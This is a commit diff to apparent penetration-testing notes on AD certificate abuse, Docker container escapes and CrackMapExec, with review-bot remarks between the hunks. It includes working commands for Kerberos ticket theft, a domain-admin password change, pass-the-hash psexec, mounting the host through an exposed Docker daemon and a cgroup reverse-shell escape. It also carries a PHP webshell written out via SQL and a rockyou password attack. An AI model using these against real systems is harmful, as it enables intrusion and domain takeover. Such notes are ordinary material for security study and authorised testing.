AD certificate and docker escapes

whackx 2024-01-11 05:40:49 +01:00
parent 74845509af
commit bbef002f0a
3 changed files with 87 additions and 48 deletions

View File

@ -29,6 +29,14 @@ Exploitable templates should have the following traits:
* Client authentication EKU for Kerberos authentication --> `Client Authentication` * Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` * Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
#### Certify
Find information about all registered CAs. For a start take a look at least at
```sh
Certify.exe find /vulnerable
```
### Certificate Creation ### Certificate Creation
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account) * `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
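Review bot: the sentence added under `#### Certify` says "Find information about all registered CAs", but the command shown is `Certify.exe find /vulnerable`, which is a filtered template search, so the description and the command do not match. Reword the sentence to say what the `/vulnerable` filter returns, and finish the dangling "For a start take a look at least at". The new `####` heading also lands directly under the template-traits list with no `###` parent of its own, so it reads as part of that list.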
@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__ * After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save * Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
* An alternative is certipy-ad An alternative is certipy-ad
#### Certipy-AD
First `pip install certipy-ad`
Take a look at the Documentation provided in the [git repositories'
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
### Impersonation ### Impersonation
* Request TGT with the created cert Request TGT with the created cert.
* Grab TGT
* On the machine via #### On the target machine via
```sh ```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller> Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
``` ```
* Select a domain admin via opening `Active Directory Users and Computers` Select a domain admin via opening `Active Directory Users and Computers`
```sh ```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser> .\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
``` ```
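Review bot: the README link added under `#### Certipy-AD` carries a tracking query string (`?source=post_page-----c56f238991c0...`) and jumps to the `#esc7` anchor, while the text points the reader at the documentation in general; drop the query string and either remove the anchor or say that ESC7 is the part meant. In the same block "certifcates" should be "certificates" and "git repositories'" should be "git repository's". The new heading `#### On the target machine via` ends on a dangling "via", and `First pip install certipy-ad` followed directly by the next sentence will render as one paragraph without a blank line between them.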
@ -61,6 +76,13 @@ exit
dir \\<domain>\<dir>$\ dir \\<domain>\<dir>$\
``` ```
#### On the attacking machine
Use impacket's psexec
```sh
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
```
## CVE-2022-26923 ## CVE-2022-26923
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions * Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
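Review bot: in the added `psexec.py` line, `$DOMAIN` is used both as the domain prefix and as the host after the `@`, which is only correct when the domain name resolves to the intended machine; a separate placeholder for the host would keep the domain/host distinction that the Rubeus lines make with `/domain:` and `/dc:`. `$found_hash` and `$DC_IP` are introduced without saying which earlier step produces them, and the rest of the file uses `<placeholder>` style rather than shell variables.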

View File

@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG> curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
``` ```
## Reversing Docker Images ## Remote Docker Daemon
* [Dive](https://github.com/wagoodman/dive) Users inside the `docker` group may open tcp socket through docker
In case you find an exposed docker daemon it can be used in the following way
```sh ```sh
dive <IMAGE-ID> docker -H tcp://$TARGET_IP:2375 ps
docker -H tcp://$TARGET_IP:2375 images
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
``` ```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon ## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker Execute commands on socket
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
```sh ```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
``` ```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease) * [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon ## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets Look out for exposed docker sockets
```sh ```sh
find / -name "*sock" 2>/dev/null find / -name "*sock" 2>/dev/null
groups groups
``` ```
* Mount the host volume and chroot to it, need alpine image. Mount the host volume and chroot to it. Ideally, use an image that is
installed already, e.g. alpine here.
```sh ```sh
docker images docker images
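Review bot: after this change the `## RCE via Exposed Docker Daemon` section consists of "Execute commands on socket" followed by an empty `sh` fence, because its three commands moved up into the new `## Remote Docker Daemon` section; remove the leftover section or keep the commands in one place only. The discovery and confirmation bullets (`nmap -sV -p-` and `curl http://test.com:2375/version`) are deleted without a replacement, so the new section starts at "In case you find an exposed docker daemon" with no check that the port really is a Docker API. The added lines also mix `tcp://$TARGET_IP:2375` and `tcp://test.com:2375`; pick one placeholder.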
@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
## Shared Namespaces ## Shared Namespaces
* Namespaces Requires root inside the container
* Cgroups
* OverlayFS
* Requires root inside the container
* Execute command
```sh ```sh
nsenter --target 1 --mount sh nsenter --target 1 --mount sh
nsenter --target 1 --mount --uts --ipc --net /bin/bash
``` ```
## Misconfiguration ## Misconfiguration
### capabilities ### Capabilities
* Privileged container connect to the host directly, not through the docker engine Privileged container connect to the host directly, not through the docker engine.
* Execution of bins on the host from libs inside the container is possible Execution of binaries on the host from inside the container is possible.
```sh ```sh
capsh --print capsh --print
``` ```
* `man capabilities`
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.) * [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit and get a reverse shell to the host via Exploit and get a reverse shell to the host via
```sh ```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
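Review bot: under `### Capabilities` the two added sentences sit on consecutive lines, so Markdown will join them into a single paragraph; keep them as list items or separate them with a blank line. "Privileged container connect" should read "Privileged containers connect". Removing the `man capabilities` pointer leaves `capsh --print` with nothing that tells the reader how to interpret its output, and in `## Shared Namespaces` the "Namespaces / Cgroups / OverlayFS" bullets are dropped without any text saying what the section title refers to.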
@ -147,7 +134,7 @@ chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
``` ```
* The file may appear outside the container on the host system Caveat: The file may appear outside the container on some host systems. Have to investigate...
### cap_admin ### cap_admin
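Review bot: the reworded caveat ends in "Have to investigate...", which is an open TODO committed into reference notes, and "some host systems" is less precise than the line it replaces. Either state the condition under which the file shows up on the host or move the open question into an issue or a clearly marked TODO line.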
@ -169,8 +156,8 @@ the docker volume, e.g.
## Check fdisk ## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device Mount the device
```sh ```sh
mkdir /mnt/hostdev mkdir /mnt/hostdev
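Review bot: with the bullets removed, the `fdisk -l` / `lsblk` line and "Mount the device" are two bare consecutive lines and will render as one run-on paragraph; keep the list markers or add a blank line. "host bulk device" looks like it should be "host block device", and since the line is being edited anyway this is the place to fix it.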
@ -218,6 +205,20 @@ Connection: Upgrade
Upgrade: tcp Upgrade: tcp
``` ```
## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## Escape through DB ## Escape through DB
* Login into DB * Login into DB
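Review bot: the relocated `## Uploading Images to Registry` section keeps the typo "Ever image has a `latest` tag" ("Every"). Apart from that the two sections are moved verbatim, so it would help to say in the commit message that this part of the change is a reorder, since the subject line only mentions new content.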
@ -226,14 +227,14 @@ Upgrade: tcp
* Select table content into a file the user can read * Select table content into a file the user can read
* Execute the file * Execute the file
```sql ```SQL
create table h4x0r (pwn varchar(1024)); create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>'); insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php'; select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
``` ```
* curl the webshell hon the exploited host curl the webshell hon the exploited host
```sh ```sh
curl <host-IP>/shell.php?cmd=id curl <host-IP>/shell.php?cmd=id
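Review bot: the fence tag changes from `sql` to `SQL` while every other fence in the file uses a lowercase tag (`sh`); keep it lowercase so highlighting stays consistent. In the same block the trailing `# In case of PostreSQL` uses `#`, which PostgreSQL does not treat as a comment marker (it uses `--`), and "PostreSQL" is misspelled. The edited line "curl the webshell hon the exploited host" still carries the stray "hon".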

View File

@ -1,23 +1,39 @@
# Crackmapexec # Crackmapexec
* Dictionary attack against SMB ## Dictionary attack against SMB
```sh ```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
``` ```
* Use the password with `impacket/examples/psexec.py` in the following way
## Brute Force attack against SMB
Brute force attack using an anonymous user
```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
```
## Use Found Password
Use the password with `impacket/examples/psexec.py` in the following way
```sh ```sh
psexec.py domain.name/<user>:<password>@<target-IP> psexec.py domain.name/<user>:<password>@<target-IP>
``` ```
## Shares ## Enumerate Shares
* Check user permissions on shares Check user permissions on shares
``sh
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
``` ```
## SMB ## SMB
* Check user hash on the network via smb
Check user hash on the network via smb
```sh ```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash> crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
``` ```
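Review bot: the flag added to the dictionary-attack line is spelled `--continue-on-sucess`; it should be `--continue-on-success`, otherwise the command fails on argument parsing. The stray `s` after `-u <user>` is carried over from the old line. The new heading `## Brute Force attack against SMB` describes a `--rid-brute` run, which enumerates RIDs rather than trying passwords, so the heading and the sentence "Brute force attack using an anonymous user" should say enumeration. Under `## SMB` the old bullet is removed with no blank line before the replacement sentence, which will attach it to the heading block in some renderers.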